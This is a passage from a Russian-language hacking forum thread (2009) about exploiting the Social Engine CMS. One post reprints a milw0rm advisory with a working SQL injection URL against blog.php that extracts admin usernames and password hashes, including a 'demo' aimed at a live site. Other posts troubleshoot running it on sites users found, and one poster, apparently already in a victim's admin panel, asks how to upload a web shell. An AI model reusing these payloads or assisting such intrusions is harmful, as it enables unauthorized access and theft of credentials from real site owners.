ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #21  
Старый 25.01.2009, 12:12
Аватар для heks
heks
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
Провел на форуме:
1484154

Репутация: 126
Отправить сообщение для heks с помощью ICQ
По умолчанию

сайт с такой уязвимостью я нашел sql видно хеш и пароль получить не могу
 
Ответить с цитированием

  #22  
Старый 25.01.2009, 16:09
Аватар для c0m
c0m
Познающий
Регистрация: 26.01.2007
Сообщений: 40
Провел на форуме:
191945

Репутация: 7
По умолчанию

может пробел стоит в слове password?
в начале сам чет не заметил
 
Ответить с цитированием

  #23  
Старый 25.01.2009, 16:39
Аватар для heks
heks
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
Провел на форуме:
1484154

Репутация: 126
Отправить сообщение для heks с помощью ICQ
По умолчанию

нет пробела в адресе не было эту фишку античата я знаю
 
Ответить с цитированием

  #24  
Старый 01.02.2009, 14:41
Аватар для c0m
c0m
Познающий
Регистрация: 26.01.2007
Сообщений: 40
Провел на форуме:
191945

Репутация: 7
По умолчанию

блоги

Код:
                                                                     
                                                                     
                                                                     
                                           
==================================================================================================================
=         SSSSS  NN    N      AA      K   K  EEEEE  SSSSS        TTTTTTTTT EEEEE     AA     MM     MM            = 
=         S      N N   N     A  A     K  K   E      S                T     E        A  A    M M   M M            =      
+         SSSSS  N  N  N    AAAAAA    KKK    EEEEE  SSSSS            T     EEEEE   AAAAAA   M  M M  M            +       
=             S  N   N N   A      A   K  K   E          S            T     E      A      A  M   M   M            =      
=         SSSSS  N    NN  A        A  K   K  EEEEE  SSSSS            T     EEEEE A        A M       M            = 
===================================================SNAKES TEAM====================================================
+                                                                                                                =
=              	             Social Engine (blog.php) SQL Injection Vulnerability                                +
+                                                                                                                =
==============================================:::ALGERIAN HaCkEr:::===============================================
                =        =                                                                =          =
                =      =          Discovered By: Snakespc  :::ALGERIAN HaCkEr:::               =     =   
                =                                                                                    =
                                    :::::Mail: snakespc@gmail.com:::::::             
                =                                                                                    =                                                                                   
                =            http://www.socialengine.net/demos.php  "blog.php"                       =
                  ===================================GAZA=============================================

Exploit:
http://localhost/blog.php?user=darkthronex&category_id=-5+UNION SELECT 1,2,3,4,5,concat(admin_username,0x3a,admin_password),7,8,9,10,11,12,13,14,15,16,17,18+from+se_admins/*
********
demo:
http://www.socialenginedev.com/blog.php?user=darkthronex&category_id=-5+UNION SELECT 1,2,3,4,5,concat(admin_username,0x3a,admin_password),7,8,9,10,11,12,13,14,15,16,17,18+from+se_admins/*
============================================================== ALLAH AKBAR=========================================================

Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::His0k4:::Houssamix:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::Th3 g0bL!N::: SuB-ZeRo
ALL www.SnakespC.com/sc >>>>dz-security.net >>>> Members 
Str0ke ....Milw0rm
=====================================================GAZA=========================================================================

# milw0rm.com [2009-01-28]
 
Ответить с цитированием

  #25  
Старый 01.02.2009, 15:25
Аватар для c0m
c0m
Познающий
Регистрация: 26.01.2007
Сообщений: 40
Провел на форуме:
191945

Репутация: 7
По умолчанию

Цитата:
Сообщение от heks  
сайт с такой уязвимостью я нашел sql видно хеш и пароль получить не могу
сейчас такая же проблема

Код:
The used SELECT statements have a different number of columns SQL was: SELECT NULL FROM se_blogentries WHERE blogentry_user_id='965' AND (blogentry_privacy & '8') && blogentry_blogentrycat_id=-21 UNION SELECT 1,2,3,4,5,concat(admin_username,0x3a,admin_password),7,8,9,10,11,12,13,14,15,16,17,18 from se_admins/*
 
Ответить с цитированием

  #26  
Старый 01.02.2009, 17:56
Аватар для mailbrush
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Цитата:
сейчас такая же проблема
Берем дружно книжечку по англ. языку и переводим:
Цитата:
The used SELECT statements have a different number of columns
Это значит
Цитата:
Используемая SELECT имеет иное кол-во столбцов
 
Ответить с цитированием

  #27  
Старый 01.02.2009, 18:35
Аватар для c0m
c0m
Познающий
Регистрация: 26.01.2007
Сообщений: 40
Провел на форуме:
191945

Репутация: 7
По умолчанию

mailbrush
да я понял,
подобрать так и не получилось
 
Ответить с цитированием

  #28  
Старый 22.02.2009, 02:49
Аватар для LordNikon
LordNikon
Новичок
Регистрация: 02.04.2007
Сообщений: 12
Провел на форуме:
105055

Репутация: 7
По умолчанию

Ребят я в админке, кто нибудь решил проблему с заливкой шелла?
И еще вопрос, кто знает какие способы заливки шелов, через картинки, через урлы или еще как. Или ткните меня пожалуйста носом где говорится об этом.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть первая k00p3r Чужие Статьи 1 12.07.2005 08:51
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ